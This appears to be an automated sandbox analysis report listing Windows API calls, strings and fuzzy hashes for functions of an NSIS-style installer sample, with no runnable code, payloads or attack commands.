                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                  • GlobalFree.KERNEL32(?), ref: 004064DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                  • API String ID: 20674999-2124804629
                                                  • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                  • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                  • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                  • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                  • GetSysColor.USER32(?), ref: 004041AF
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                  • lstrlenW.KERNEL32(?), ref: 004041D6
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                    • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                  • SendMessageW.USER32(00000000), ref: 00404251
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                  • SetCursor.USER32(00000000), ref: 004042D2
                                                  • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                  • SetCursor.USER32(00000000), ref: 004042F6
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                  • String ID: @%F$N$open
                                                  • API String ID: 3928313111-3849437375
                                                  • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                  • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                  • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                  • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                  APIs
                                                  • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                  • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                  • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                  • wsprintfA.USER32 ref: 00406B4D
                                                  • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                  • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                  • String ID: F$%s=%s$NUL$[Rename]
                                                  • API String ID: 565278875-1653569448
                                                  • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                  • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                  • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                  • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                  • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                  • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                  • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                  • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                  • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                  • API String ID: 1641139501-220328614
                                                  • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                  • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                  • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                  • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                  Strings
                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID: created uninstaller: %d, "%s"
                                                  • API String ID: 3294113728-3145124454
                                                  • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                  • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                  • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                  • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                  • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                  • API String ID: 3734993849-2769509956
                                                  • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                  • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                  • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                  • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                  • GetSysColor.USER32(00000000), ref: 00403E00
                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                  • SetBkMode.GDI32(?,?), ref: 00403E18
                                                  • GetSysColor.USER32(?), ref: 00403E2B
                                                  • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                  • DeleteObject.GDI32(?), ref: 00403E55
                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                  • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                  • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                  • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                  Strings
                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                  • API String ID: 1033533793-945480824
                                                  • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                  • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                  • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                  • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                  APIs
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                    • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                  Strings
                                                  • Exec: command="%s", xrefs: 00402241
                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                  • Exec: success ("%s"), xrefs: 00402263
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                  • API String ID: 2014279497-3433828417
                                                  • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                  • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                  • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                  • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                  • GetMessagePos.USER32 ref: 00404871
                                                  • ScreenToClient.USER32(?,?), ref: 00404889
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
